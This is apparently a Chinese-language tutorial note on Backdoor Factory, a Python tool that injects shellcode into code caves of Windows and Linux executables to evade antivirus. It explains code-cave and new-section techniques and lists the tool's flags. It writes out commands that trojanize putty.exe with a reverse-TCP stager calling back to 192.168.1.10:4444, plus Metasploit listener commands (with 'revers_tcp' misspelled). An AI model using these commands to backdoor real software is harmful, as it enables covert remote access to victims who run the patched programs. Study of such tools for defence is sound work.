Backdoor-------python编写
适用于windows PE x32/x64 和Linux ELF x32/x64(OSX),支持msf payload 自定义payload
将shellcode代码patch进行模板文件,躲避AV检查
Patch:
通过替换exe,dll,注册表等方法修复系统漏洞或问题的方法
BDF:向二进制文件中增加或删除代码内容,某些受保护的二进制程序无法patch,存在一定概率文件会被patch坏掉
CTP方法--------增加新的代码段section,与msf的-k方法类似,使用现有的代码裂缝(code cave)存放shellcode
代码裂缝-------二进制文件中超过两个字节的连续x00区域(代码片段间区域),根据统计判断代码缝隙是编译器在进行编译时造成的,不同的编译器造成的代码缝隙大小不同
hexeditor查看某程序的代码裂缝
单个代码洞大小不足以存放完整的shellcode,多个代码洞跳转--非顺序执行(初期免杀率可达100%),结合msf的stager方法
patch选项----附加代码段,单代码注入,多代码注入
常用参数:
-f 指定某程序注入payload
-S 检查当前文件是否支持注入后门
-s 可以使用的有效负载,使用“show”来查看有效载荷
-H 接受反弹会话的ip主机
-c 代码裂缝,确定支持patch 后,查看其是否支持指定的 shellcode patch
-l 代码裂缝大小
-J 使用多代码缝隙跳转的方式
-a 使用add-new-section添加代码段
backdoor-factory -f putty.exe -S(查看是否支持注入后门)
backdoor-factory -f putty.exe -s show(查看支持的有效负载有哪些)
backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444(使用iat_reverse_tcp_stager_threaded负载)
使用 msf 侦听
set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit
backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -J(使用多代码缝隙跳转的方式)
backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -a(使用add-new-section添加代码段)
使用 msf 侦听
set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn